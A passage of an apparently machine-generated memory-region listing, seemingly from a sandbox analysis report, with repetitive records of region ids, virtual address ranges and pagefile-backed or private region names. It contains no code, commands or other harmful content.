0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12279 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12280 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12281 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12282 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12283 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12318 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12319 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12327 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12333 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12334 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12337 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12338 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12357 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12401 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12402 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12406 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12407 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12408 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12409 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12410 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12411 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12412 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12413 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12414 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12415 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12416 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12417 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12418 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12419 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12420 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12421 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12422 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12423 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12424 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12425 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12426 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12427 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12428 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12429 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12430 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12431 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12432 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12433 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12434 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12435 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12436 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12437 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12438 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12439 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12440 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12441 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12442 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12443 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12444 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12445 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12446 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12447 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12448 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12449 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12452 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12453 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = 